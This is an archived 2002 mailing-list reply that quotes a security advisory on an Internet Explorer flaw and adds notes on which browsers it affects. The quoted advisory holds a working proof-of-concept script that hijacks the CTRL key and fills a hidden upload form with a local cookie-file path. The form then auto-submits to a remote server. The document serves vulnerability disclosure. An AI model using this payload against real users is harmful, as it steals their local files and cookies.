Re: Pressing CTRL in IE is dangerous - Sandblad advisory #8

From: Peter Pentchev (roamat_private)
Date: Wed Jul 24 2002 - 01:42:01 PDT

    On Tue, Jul 23, 2002 at 09:50:30PM +0200, Andreas Sandblad wrote:
    > 
    >                   - Sandblad advisory #8 -
    > 
    > ---..---..---..---..---..---..---..---..---..---..---..---..----
    > Title:      Pressing CTRL in IE is dangerous
    > Date:       [2002-07-23]
    > Software:   Internet Explorer
    > Impact:     Pressing CTRL in IE may result in arbitrary local
    >             file to be uploaded to a remote server (no exact
    >             path needed). If special sensitive information is
    >             uploaded, it may be used to run remote programs.
    [snip]
    > 1. When a user presses the CTRL key an onkeydown event can be set to
    > fire. In the event function the key pressed is changed to 'V'. The result
    > will be a paste operation with less restrictions.
    > 
    > 2. The content of the clipboard is altered and focus is changed to a
    > hidden file upload form. The paste operation will be performed into the
    > form, yielding a change of value for the file upload field (not normally
    > allowed).
    > 
    > 3. The upload form is submitted automatically (legal javascript operation).
    [snip]
    > <!div id=h style="zoom:0.0001">
    > <!form name=u enctype="multipart/form-data" method=post action=upload.php>
    > <!input type=file name=file></form></div>
    > <!script>
    > //uploadFile="..\\LOCALS~1\\TEMPOR~1\\CONTENT.IE5\\index.dat";
    > uploadFile="..\\Cookies\\index.dat";
    > function gotKey(){
    >   if (!event.ctrlKey) return;
    >   document.onkeydown = null;
    >   event.keyCode = 86;
    >   window.clipboardData.setData("Text",uploadFile);
    >   (p=document.forms.u.file).focus();
    >   p.onpropertychange = function(){document.forms.u.submit()};
    > } document.onkeydown = gotKey;
    > window.onload=function(){document.body.focus()};
    > <!/script>
    
    This was verified to work on various versions of IE 5 and 6, and also
    on Opera 6.01 build 1041.  However, Mozilla 1.0rc1 is NOT vulnerable,
    partly because of a script error (the onkeypress handler should accept
    a parameter instead of referring to 'event' directly), and mostly because
    of the fact that in Mozilla, event.keyCode is not settable.
    
    G'luck,
    Peter
    
    -- 
    Peter Pentchev	roamat_private	roamat_private
    PGP key:	http://people.FreeBSD.org/~roam/roam.key.asc
    Key fingerprint	FDBA FD79 C26F 3C51 C95E  DF9E ED18 B68D 1619 4553
    If you think this sentence is confusing, then change one pig.
    This archive was generated by hypermail 2b30 : Wed Jul 24 2002 - 11:54:38 PDT